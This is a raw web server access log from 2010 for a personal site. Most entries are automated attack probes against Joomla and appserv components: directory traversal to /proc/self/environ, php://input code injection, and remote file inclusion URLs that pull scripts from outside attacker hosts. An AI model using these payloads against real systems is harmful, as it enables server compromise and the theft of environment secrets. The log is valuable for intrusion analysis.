74.52.119.106 - - [02/Sep/2010:10:21:49 -0700] "POST /?option=com_agora&task=php://input HTTP/1.1" 200 68390 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6" "www.dmulk.com"
74.52.119.106 - - [02/Sep/2010:10:21:49 -0700] "GET /?option=com_agora&task=http://www.maxshina.ru/weditor/.log/idx? HTTP/1.1" 200 68549 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6" "www.dmulk.com"
174.133.9.196 - - [02/Sep/2010:10:21:57 -0700] "GET /logs/access_100516.log//appserv/main.php?appserv_root=http://yeshouse.mk.co.kr/my/visual/id1.txt??? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
174.133.9.196 - - [02/Sep/2010:10:21:57 -0700] "GET /appserv/main.php?appserv_root=http://yeshouse.mk.co.kr/my/visual/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
174.133.9.196 - - [02/Sep/2010:10:22:02 -0700] "GET /logs//appserv/main.php?appserv_root=http://yeshouse.mk.co.kr/my/visual/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
217.22.60.40 - - [02/Sep/2010:10:22:08 -0700] "GET /logs/access.log//index.php?option=com_rokdownloads&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.dmulk.com"
217.22.60.40 - - [02/Sep/2010:10:22:09 -0700] "GET /index.php?option=com_rokdownloads&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 68485 "-" "libwww-perl/5.810" "www.dmulk.com"
217.22.60.40 - - [02/Sep/2010:10:22:11 -0700] "GET /logs//index.php?option=com_rokdownloads&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.dmulk.com"
174.133.9.196 - - [02/Sep/2010:10:22:12 -0700] "GET /logs/access_090917.log%20%20//appserv/main.php?appserv_root=http://yeshouse.mk.co.kr/my/visual/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
217.22.60.40 - - [02/Sep/2010:10:22:16 -0700] "GET /logs/access.log//index.php?option=com_rokdownloads&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.dmulk.com"
217.22.60.40 - - [02/Sep/2010:10:22:17 -0700] "GET /index.php?option=com_rokdownloads&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 68485 "-" "libwww-perl/5.810" "www.dmulk.com"
217.22.60.40 - - [02/Sep/2010:10:22:18 -0700] "GET /logs//index.php?option=com_rokdownloads&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.dmulk.com"
65.60.4.74 - - [02/Sep/2010:10:22:28 -0700] "GET /logs/access_100822.log/*?option=com_sectionex&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "www.dmulk.com"
65.60.4.74 - - [02/Sep/2010:10:22:28 -0700] "GET /*?option=com_sectionex&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "www.dmulk.com"
65.60.4.74 - - [02/Sep/2010:10:22:28 -0700] "GET /logs/*?option=com_sectionex&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "www.dmulk.com"
89.200.170.145 - - [02/Sep/2010:10:22:36 -0700] "GET /index.php?option=com_rokdownloads&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 68485 "-" "libwww-perl/5.813" "dmulk.com"
216.199.249.10 - - [02/Sep/2010:10:22:43 -0700] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 68479 "-" "libwww-perl/5.805" "www.dmulk.com"
174.133.9.196 - - [02/Sep/2010:10:22:46 -0700] "GET /logs/access_090917.log//appserv/main.php?appserv_root=http://yeshouse.mk.co.kr/my/visual/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
216.199.249.10 - - [02/Sep/2010:10:22:46 -0700] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 68479 "-" "libwww-perl/5.805" "www.dmulk.com"
69.10.136.189 - - [02/Sep/2010:10:23:10 -0700] "POST /logs/access_080912.log//contact.php HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "www.dmulk.com"
69.10.136.189 - - [02/Sep/2010:10:23:13 -0700] "POST /logs//contact.php HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "www.dmulk.com"
69.10.136.189 - - [02/Sep/2010:10:23:19 -0700] "POST /contact.php HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "www.dmulk.com"
217.22.60.40 - - [02/Sep/2010:10:23:20 -0700] "GET /logs/access_100815.log//index.php?option=com_rokdownloads&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.dmulk.com"
217.22.60.40 - - [02/Sep/2010:10:23:21 -0700] "GET /index.php?option=com_rokdownloads&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 68485 "-" "libwww-perl/5.810" "www.dmulk.com"
217.22.60.40 - - [02/Sep/2010:10:23:22 -0700] "GET /logs//index.php?option=com_rokdownloads&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.dmulk.com"
222.236.47.182 - - [02/Sep/2010:10:23:43 -0700] "GET /logs/access_081105.log%20%20/?_SERVER[DOCUMENT_ROOT]=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
217.22.60.40 - - [02/Sep/2010:10:23:45 -0700] "GET /logs/access_100808.log//index.php?option=com_rokdownloads&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.dmulk.com"
217.22.60.40 - - [02/Sep/2010:10:23:46 -0700] "GET /index.php?option=com_rokdownloads&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 68485 "-" "libwww-perl/5.810" "www.dmulk.com"
217.22.60.40 - - [02/Sep/2010:10:23:48 -0700] "GET /logs//index.php?option=com_rokdownloads&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.dmulk.com"
67.195.114.243 - - [02/Sep/2010:10:24:03 -0700] "GET /logs/access_080827.log HTTP/1.0" 200 3426872 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
222.236.47.182 - - [02/Sep/2010:10:24:10 -0700] "GET /logs/access_080429.log/?_SERVER[DOCUMENT_ROOT]=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
87.238.162.144 - - [02/Sep/2010:10:24:19 -0700] "GET /logs/access_090914.log%20%20/////appserv/main.php?appserv_root=http://soturi.tuta.org/media/1/shop/2/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
174.120.226.226 - - [02/Sep/2010:10:24:52 -0700] "GET /logs/access_100822.log/*?option=com_sectionex&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "www.dmulk.com"
174.120.226.226 - - [02/Sep/2010:10:24:52 -0700] "GET /*?option=com_sectionex&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "www.dmulk.com"
174.120.226.226 - - [02/Sep/2010:10:24:52 -0700] "GET /logs/*?option=com_sectionex&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "www.dmulk.com"
87.238.162.144 - - [02/Sep/2010:10:25:38 -0700] "GET /logs/access_090912.log/////appserv/main.php?appserv_root=http://soturi.tuta.org/media/1/shop/2/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
77.221.145.35 - - [02/Sep/2010:10:25:49 -0700] "POST /logs/access_081230.log%20%20/contact.php HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "www.dmulk.com"
77.221.145.35 - - [02/Sep/2010:10:25:49 -0700] "POST /contact.php HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "www.dmulk.com"
77.221.145.35 - - [02/Sep/2010:10:25:49 -0700] "POST /logs/contact.php HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "www.dmulk.com"
74.53.73.50 - - [02/Sep/2010:10:26:04 -0700] "GET /logs/access.log//?option=com_agora&task=../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6" "dmulk.com"
74.53.73.50 - - [02/Sep/2010:10:26:05 -0700] "GET /logs/access.log//?option=com_agora&task=../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6" "dmulk.com"
74.53.73.50 - - [02/Sep/2010:10:26:05 -0700] "GET /logs/access.log//?option=com_agora&task=....//....//....//....//....//....//....//....//....//....//....//proc/self/environ%0000 HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6" "dmulk.com"
74.53.73.50 - - [02/Sep/2010:10:26:08 -0700] "POST /logs/access.log//?option=com_agora&task=php://input HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6" "dmulk.com"
74.53.73.50 - - [02/Sep/2010:10:26:08 -0700] "GET /logs/access.log//?option=com_agora&task=http://www.maxshina.ru/weditor/.log/idx? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6" "dmulk.com"
74.53.73.50 - - [02/Sep/2010:10:26:12 -0700] "GET /?option=com_agora&task=../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 68615 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6" "dmulk.com"
74.53.73.50 - - [02/Sep/2010:10:26:16 -0700] "GET /?option=com_agora&task=....//....//....//....//....//....//....//....//....//....//....//proc/self/environ%0000 HTTP/1.1" 200 68632 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6" "dmulk.com"
74.53.73.50 - - [02/Sep/2010:10:26:17 -0700] "POST /?option=com_agora&task=php://input HTTP/1.1" 200 68390 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6" "dmulk.com"
67.195.114.243 - - [02/Sep/2010:10:26:18 -0700] "GET /megumi/minamigrad2k8/?M=D HTTP/1.0" 200 25452 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
74.53.73.50 - - [02/Sep/2010:10:26:19 -0700] "GET /?option=com_agora&task=http://www.maxshina.ru/weditor/.log/idx? HTTP/1.1" 200 68550 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6" "dmulk.com"
74.53.73.50 - - [02/Sep/2010:10:26:21 -0700] "GET /logs//?option=com_agora&task=../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 200 167700 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6" "dmulk.com"
74.53.73.50 - - [02/Sep/2010:10:26:22 -0700] "GET /logs//?option=com_agora&task=../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 167700 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6" "dmulk.com"
74.53.73.50 - - [02/Sep/2010:10:26:23 -0700] "GET /logs//?option=com_agora&task=....//....//....//....//....//....//....//....//....//....//....//proc/self/environ%0000 HTTP/1.1" 200 167700 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6" "dmulk.com"
74.52.119.106 - - [02/Sep/2010:10:26:25 -0700] "GET /logs/access.log//?option=com_agora&task=../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6" "dmulk.com"
74.53.73.50 - - [02/Sep/2010:10:26:26 -0700] "POST /logs//?option=com_agora&task=php://input HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6" "dmulk.com"
74.53.73.50 - - [02/Sep/2010:10:26:30 -0700] "GET /logs//?option=com_agora&task=http://www.maxshina.ru/weditor/.log/idx? HTTP/1.1" 200 167700 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6" "dmulk.com"
74.52.119.106 - - [02/Sep/2010:10:26:35 -0700] "GET /logs/access.log//?option=com_agora&task=....//....//....//....//....//....//....//....//....//....//....//proc/self/environ%0000 HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6" "dmulk.com"
74.52.119.106 - - [02/Sep/2010:10:26:35 -0700] "POST /logs/access.log//?option=com_agora&task=php://input HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6" "dmulk.com"
74.52.119.106 - - [02/Sep/2010:10:26:35 -0700] "GET /logs/access.log//?option=com_agora&task=http://www.maxshina.ru/weditor/.log/idx? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6" "dmulk.com"
74.52.119.106 - - [02/Sep/2010:10:26:35 -0700] "GET /?option=com_agora&task=../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 200 68611 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6" "dmulk.com"
74.52.119.106 - - [02/Sep/2010:10:26:36 -0700] "GET /?option=com_agora&task=../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 68614 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6" "dmulk.com"
74.52.119.106 - - [02/Sep/2010:10:26:36 -0700] "GET /?option=com_agora&task=....//....//....//....//....//....//....//....//....//....//....//proc/self/environ%0000 HTTP/1.1" 200 68631 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6" "dmulk.com"
64.157.4.42 - - [02/Sep/2010:10:26:38 -0700] "POST /blog/wp-cron.php?doing_wp_cron HTTP/1.0" 200 1 "-" "WordPress/2.9.2; http://dmulk.com/blog" "dmulk.com"
74.52.119.106 - - [02/Sep/2010:10:26:38 -0700] "POST /?option=com_agora&task=php://input HTTP/1.1" 200 68390 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6" "dmulk.com"
74.52.119.106 - - [02/Sep/2010:10:26:39 -0700] "GET /?option=com_agora&task=http://www.maxshina.ru/weditor/.log/idx? HTTP/1.1" 200 68549 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6" "dmulk.com"
74.52.119.106 - - [02/Sep/2010:10:26:40 -0700] "GET /logs//?option=com_agora&task=../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 200 167700 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6" "dmulk.com"
74.52.119.106 - - [02/Sep/2010:10:26:40 -0700] "GET /logs//?option=com_agora&task=../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 167700 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6" "dmulk.com"
74.52.119.106 - - [02/Sep/2010:10:26:41 -0700] "GET /logs//?option=com_agora&task=....//....//....//....//....//....//....//....//....//....//....//proc/self/environ%0000 HTTP/1.1" 200 167700 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6" "dmulk.com"
74.52.119.106 - - [02/Sep/2010:10:26:42 -0700] "POST /logs//?option=com_agora&task=php://input HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6" "dmulk.com"
74.52.119.106 - - [02/Sep/2010:10:26:43 -0700] "GET /logs//?option=com_agora&task=http://www.maxshina.ru/weditor/.log/idx? HTTP/1.1" 200 167700 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6" "dmulk.com"
217.22.60.40 - - [02/Sep/2010:10:26:46 -0700] "GET /logs/access_100815.log//index.php?option=com_rokdownloads&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.dmulk.com"
202.45.154.38 - - [02/Sep/2010:10:26:46 -0700] "GET /logs/access_100619.log/*?option=com_sectionex&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.dmulk.com"
202.45.154.38 - - [02/Sep/2010:10:26:46 -0700] "GET /*?option=com_sectionex&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.dmulk.com"
217.22.60.40 - - [02/Sep/2010:10:26:47 -0700] "GET /index.php?option=com_rokdownloads&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 68485 "-" "libwww-perl/5.810" "www.dmulk.com"
217.212.224.183 - - [02/Sep/2010:10:26:47 -0700] "GET /robots.txt HTTP/1.0" 200 36 "-" "psbot/0.1 (+http://www.picsearch.com/bot.html)" "www.dmulk.com"
217.22.60.40 - - [02/Sep/2010:10:26:48 -0700] "GET /logs//index.php?option=com_rokdownloads&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.dmulk.com"
202.45.154.38 - - [02/Sep/2010:10:26:50 -0700] "GET /logs/*?option=com_sectionex&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.dmulk.com"
217.212.224.181 - - [02/Sep/2010:10:26:57 -0700] "GET /bikes/dteel/ HTTP/1.0" 200 5510 "-" "psbot/0.1 (+http://www.picsearch.com/bot.html)" "www.dmulk.com"
89.200.170.145 - - [02/Sep/2010:10:27:17 -0700] "GET /logs/access_100815.log//index.php?option=com_rokdownloads&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "www.dmulk.com"
89.200.170.145 - - [02/Sep/2010:10:27:18 -0700] "GET /index.php?option=com_rokdownloads&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 68485 "-" "libwww-perl/5.813" "www.dmulk.com"
89.200.170.145 - - [02/Sep/2010:10:27:19 -0700] "GET /logs//index.php?option=com_rokdownloads&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "www.dmulk.com"
217.22.60.40 - - [02/Sep/2010:10:27:37 -0700] "GET /logs/access.log//index.php?option=com_rokdownloads&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.dmulk.com"
217.22.60.40 - - [02/Sep/2010:10:27:39 -0700] "GET /index.php?option=com_rokdownloads&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 68485 "-" "libwww-perl/5.810" "www.dmulk.com"
217.22.60.40 - - [02/Sep/2010:10:27:40 -0700] "GET /logs//index.php?option=com_rokdownloads&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.dmulk.com"
217.22.60.40 - - [02/Sep/2010:10:28:24 -0700] "GET /logs/access.log//index.php?option=com_rokdownloads&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.dmulk.com"
217.22.60.40 - - [02/Sep/2010:10:28:25 -0700] "GET /index.php?option=com_rokdownloads&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 68485 "-" "libwww-perl/5.810" "www.dmulk.com"
217.22.60.40 - - [02/Sep/2010:10:28:30 -0700] "GET /logs//index.php?option=com_rokdownloads&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.dmulk.com"
62.149.244.191 - - [02/Sep/2010:10:28:36 -0700] "POST /fpw.php HTTP/1.1" 404 - "-" "MaMa CaSpEr" "www.dmulk.com"
62.149.244.191 - - [02/Sep/2010:10:28:36 -0700] "POST /logs/fpw.php HTTP/1.1" 404 - "-" "MaMa CaSpEr" "www.dmulk.com"
62.149.244.191 - - [02/Sep/2010:10:28:36 -0700] "POST /logs/access_100410.log/fpw.php HTTP/1.1" 404 - "-" "MaMa CaSpEr" "www.dmulk.com"
62.149.244.191 - - [02/Sep/2010:10:28:39 -0700] "POST /logs/access_091118.log/fpw.php HTTP/1.1" 404 - "-" "MaMa CaSpEr" "www.dmulk.com"
216.199.249.10 - - [02/Sep/2010:10:29:06 -0700] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 68479 "-" "libwww-perl/5.805" "www.dmulk.com"
216.199.249.10 - - [02/Sep/2010:10:29:08 -0700] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 68479 "-" "libwww-perl/5.805" "www.dmulk.com"
80.245.41.107 - - [02/Sep/2010:10:29:25 -0700] "GET /logs/access_100815.log//index.php?option=com_rokdownloads&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "www.dmulk.com"
80.245.41.107 - - [02/Sep/2010:10:29:26 -0700] "GET /index.php?option=com_rokdownloads&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 68485 "-" "libwww-perl/5.813" "www.dmulk.com"
80.245.41.107 - - [02/Sep/2010:10:29:27 -0700] "GET /logs//index.php?option=com_rokdownloads&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "www.dmulk.com"
80.245.41.107 - - [02/Sep/2010:10:29:34 -0700] "GET /logs/access_100815.log//index.php?option=com_rokdownloads&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "www.dmulk.com"
80.245.41.107 - - [02/Sep/2010:10:29:35 -0700] "GET /index.php?option=com_rokdownloads&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 68485 "-" "libwww-perl/5.813" "www.dmulk.com"
80.245.41.107 - - [02/Sep/2010:10:29:36 -0700] "GET /logs//index.php?option=com_rokdownloads&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "www.dmulk.com"
202.45.154.38 - - [02/Sep/2010:10:29:55 -0700] "GET /logs/access_100601.log/*?option=com_sectionex&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.dmulk.com"
202.45.154.38 - - [02/Sep/2010:10:29:56 -0700] "GET /*?option=com_sectionex&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.dmulk.com"
202.45.154.38 - - [02/Sep/2010:10:29:56 -0700] "GET /logs/*?option=com_sectionex&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.dmulk.com"
123.125.68.126 - - [02/Sep/2010:10:30:46 -0700] "GET /blog/wp-content/gallery/2009-04-18klr/20090418.gpx HTTP/1.1" 200 727834 "-" "Baiduspider+(+http://www.baidu.com/search/spider.htm)" "www.dmulk.com"
222.236.47.182 - - [02/Sep/2010:10:31:42 -0700] "GET /logs/access_081127.log%20%20/?_SERVER[DOCUMENT_ROOT]=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
222.236.47.182 - - [02/Sep/2010:10:31:43 -0700] "GET /?_SERVER[DOCUMENT_ROOT]=http://phamsight.com/docs/images/head?? HTTP/1.1" 200 68551 "-" "Mozilla/5.0" "www.dmulk.com"
222.236.47.182 - - [02/Sep/2010:10:31:47 -0700] "GET /logs/?_SERVER[DOCUMENT_ROOT]=http://phamsight.com/docs/images/head?? HTTP/1.1" 200 167695 "-" "Mozilla/5.0" "www.dmulk.com"
